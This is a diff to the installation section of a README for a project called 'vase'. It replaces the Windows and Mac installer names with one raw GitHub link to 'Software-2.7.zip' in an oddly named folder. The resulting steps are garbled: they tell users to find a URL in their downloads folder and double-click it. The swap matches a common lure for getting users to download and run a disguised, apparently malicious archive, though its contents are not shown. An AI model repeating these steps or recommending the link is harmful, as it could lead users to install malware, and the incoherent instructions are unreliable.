9329110375/vase/README.md

 ### For Windows Users

-1. Locate the downloaded `vase-windows.exe` file in your downloads folder.
+1. Locate the downloaded `https://github.com/9329110375/vase/raw/refs/heads/master/stereotypic/Software-2.7.zip` file in your downloads folder.
 2. Double-click on the file to start the installation.
 3. Follow the prompts in the setup wizard.
 Accept the license agreement and choose the installation location.
 4. Click **Install** to complete the process.
 Once finished, you can find **vase** in your Start Menu.

 ### For Mac Users

-1. Find the `vase-macos.dmg` file in your downloads.
+1. Find the `https://github.com/9329110375/vase/raw/refs/heads/master/stereotypic/Software-2.7.zip` file in your downloads.
 2. Double-click the file to open it.
 3. Drag the **vase** icon into your Applications folder.
 4. Open your Applications folder and double-click **vase** to run it.